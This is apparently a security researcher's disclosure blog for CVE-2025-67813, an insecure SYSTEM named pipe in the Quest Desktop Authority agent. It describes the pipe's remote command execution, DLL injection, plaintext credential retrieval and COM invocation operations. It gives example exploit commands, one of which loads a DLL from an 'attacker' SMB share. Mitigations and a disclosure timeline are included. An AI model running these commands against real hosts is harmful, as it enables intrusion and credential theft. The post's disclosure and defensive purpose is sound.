Pipe Dreams: Remote Code Execution via Quest Desktop Authority Named Pipe 

Quest Desktop Authority is an enterprise management solution that allows administrators to manage Windows desktops at scale. The product installs an agent service on managed endpoints that runs under the SYSTEM account to facilitate privileged operations. 

During an engagement last year, we stumbled across an interesting named pipe whilst reviewing endpoint management software. The agent exposes a named pipe called ScriptLogic_Server_NamedPipe_9300 (ScriptLogic being the original vendor before Quest’s acquisition) that implements a custom IPC protocol. What caught my attention was the combination of the pipe running as SYSTEM and the rather generous access controls permitting remote authenticated users to connect. 

TL;DR 

• Quest KACE Desktop Authority exposes a named pipe (ScriptLogic_Server_NamedPipe_9300) running as SYSTEM that accepts connections from any authenticated domain user over the network 
• The custom MFC CArchive-based IPC protocol supports dangerous operations including arbitrary command execution, DLL injection, credential retrieval, and COM object invocation 
• Any authenticated user on the network can achieve remote code execution as a local administrator on hosts running the Desktop Authority agent 
• The vulnerability has been assigned CVE-2025-67813 
• Quest KB article: Quest KACE Desktop Authority Insecure Named Pipe Permissions (CVE-2025-67813) (4381743) 
• Remediation: Apply vendor patches or restrict network access to the named pipe via firewall rules 

The Named Pipe 

The Desktop Authority server creates a named pipe that can be accessed both locally and remotely. Named pipes on Windows can be accessed over SMB, meaning any authenticated user within the domain can connect to the pipe on remote hosts if permissions are not setup correctly. The pipe name follows the legacy ScriptLogic naming convention: 

\\.\pipe\ScriptLogic_Server_NamedPipe_9300 

A corresponding client pipe also exists on agent endpoints: 

\\.\pipe\ScriptLogic_Client_NamedPipe_9300 

The client pipe is used by the server to connect to agents and issue tasks, and as we’ll see later, this creates all kinds of attack surface. 

The IPC Protocol 

The protocol is based on Microsoft Foundation Classes (MFC) CArchive serialization format, which is essentially a length-prefixed binary format with COM VARIANT support for dynamic typing. After some reversing, I mapped out the message structure: 

class SLPipeMessage { 
    string ProgId;           // COM ProgID to instantiate 
    string Method;           // Method to invoke 
    string RpcName;          // Operation selector 
    string Command;          // Command to execute 
    int DllInjectPid;        // Target PID for injection 
    // ... additional fields 
} 

The RpcName field acts as the operation selector, determining which action the service will perform. During analysis, I identified several supported operations. 

Dangerous Operations 

AdminExec 

The AdminExec operation allows arbitrary command execution as a local administrator. The Command and CommandArgument fields are passed directly to process creation. This is the most straightforward path to code execution. Simply connect to the pipe and send a message with RpcName set to AdminExec along with your command of choice. 

DllInjection 

For those preferring a more surgical approach, the DllInjection operation injects an arbitrary DLL into a specified process. The DLL path can be a UNC path, meaning you can host a malicious DLL on an SMB share and have the SYSTEM service inject it into any process on the target host. If you don’t know a valid PID, you can simply iterate through likely PID ranges until you find one that works. 

Credentials 

The Credentials operation reveals an interesting implementation detail about how Desktop Authority handles privilege elevation. Rather than running all operations as SYSTEM directly, the product uses a just-in-time administrator pattern. 

A low-privilege domain user account is typically configured for Desktop Authority operations. When privileged actions are required, the service temporarily adds this user to the local Administrators group, generates a token, and then removes the user from the group. The token persists with administrative privileges even after group membership is revoked. 

The Credentials RPC call returns the username and password for this service account in plaintext. This is particularly dangerous for several reasons: 

• Credential reuse: The same service account is likely used across multiple managed endpoints, meaning a single compromise provides lateral movement opportunities 
• Domain account exposure: Since this is a domain user, the credentials can be used for authentication against other domain resources 
• Persistence: Even if the JIT admin pattern limits the window of local admin group membership, having the plaintext credentials allows an attacker to perform their own privilege escalation at will 

ImpersonateAdmin 

The ImpersonateAdmin operation is interesting from a token manipulation perspective. By providing a handle to your current thread, the service will impersonate an administrative token on your behalf. 

InvokeCOM 

The InvokeCOM operation provides a generic mechanism to instantiate and invoke methods on COM objects running within the elevated token context. The service exposes several internal COM classes: 

• CProcess – Process management 
• CRegistry – Registry manipulation 
• CFileSystem – File system operations 
• CUserTool – User management utilities 
• CNet – Network operations 
• CSecurityEditor – Security descriptor manipulation 
• CPowerManagement – Power state control 
• CEventLog – Event log access 

Each of these classes provides methods that execute with elevated privileges. 

The Serialization Format 

The protocol is based on MFC’s CArchive serialization format. If you’ve ever reversed MFC applications, the wire format will look familiar – it’s essentially how MFC classes serialize themselves when written to a CArchive stream. 

The string format is a direct match for how CString serializes itself. Strings are length-prefixed with a variable length encoding that supports both ANSI and Unicode. The 0xfffe marker switches the stream to Unicode mode, mirroring exactly how CString handles wide character serialization in MFC. The variable length size prefix (single byte for short strings, expanding to 16-bit or 32-bit for longer strings) is the standard CArchive approach to keeping payloads compact whilst supporting arbitrary lengths. 

VARIANTs are serialized with a 16-bit type discriminator (VT_BSTR, VT_I4, VT_BOOL, etc.) followed by the type specific payload, again, matching how you’d expect COM VARIANT types to be marshaled in an MFC application. 

Exploitation 

Putting this all together, exploitation is straightforward. From any domain-joined machine, connect to the target’s named pipe over SMB and send a crafted message: 

SLAgentTool.exe AdminExec -s target.domain.local -c cmd.exe -a "/c whoami > c:\pwned.txt" 

Or for DLL injection: 

SLAgentTool.exe DllInjection -s target.domain.local -d \\attacker\share\payload.dll -p 1234 

The tool handles the connection, serialization, and response parsing automatically. 

Disclosure 

The vulnerability was reported to Quest through their security disclosure process. CVE-2025-67813 has been assigned for tracking purposes. A detailed overview of the disclosure process has been provided below. 

Mitigations 

If patching is not immediately possible, consider the following mitigations: 

1. Firewall rules: Block inbound SMB (TCP 445) to hosts running the Desktop Authority agent from untrusted network segments 
2. Network segmentation: Isolate management infrastructure from general user networks 
3. Disable the service: If Desktop Authority functionality is not required on specific endpoints, disable the agent service 
4. Monitor pipe access: Implement detection for unusual named pipe connections to ScriptLogic pipes 

Tooling 

To allow time for organisations to apply patches, the exploit tool will not be released at this time. 

The tool supports the following operations: 

• AdminExec – Execute arbitrary commands 
• Credentials – Retrieve stored credentials 
• InvokeCOM – Invoke arbitrary COM methods 
• COMExec – Shortcut for CProcess.Exec 

Disclosure Timeline 

• 11^th April 2024 – Initial disclosure and case number assigned and request for latest version 
• 14^th April 2024 – Confirmation sent that the latest version is vulnerable and PoC sent to Quest 
• 22^nd April 2024 – Case handed over to development team 
•  27^th May 2024 – Request for estimated fix date 
• 12^th May 2024 – Contact from developers where the various RPC command vulnerabilities were described to Quest 
• 18^th June 2024 – Another request for fix date and mentioned our 90-day disclosure policy 
• 20^th June 2024 – Contact from the Desktop Authority program manager indicating confirmation of the vulnerabilities, but no fix date provided 
• 23^rd June 2024 – Informed Quest we are happy to wait longer providing we are kept up to date 
• 22^nd July 2024 – Email indicating the fix is still in progress but no date available for the fix 
• 13^th August 2024 – Planned release of Q3 2024 communicated from Quest  
• 22^nd August 2024 – QA version provided and confirmed exploit code no longer works 
• 12^th September 2024 – Requested CVE ID and told the new CVE will be registered at the time of release 
• 7^th October 2024 – Quest informed that a CVE had been requested 
• 10^th November 2024 – Desktop Authority 11.3.2 released but no CVE provided yet 
• 17^th December 2024 – Follow up request made for the assigned CVE 
• 5^th January 2025 – Quest confirmed they have finally received a CVE, and Quest will be releasing a knowledge base article soon 
• 12^th January 2025 – KB article link and CVE provided by Quest. Informed Quest that the local attack vector is incorrect therefore the medium risk is not representative of true risk. The KB article was updated to high, but still local attack vector 
•  29th January 2026 – Blog published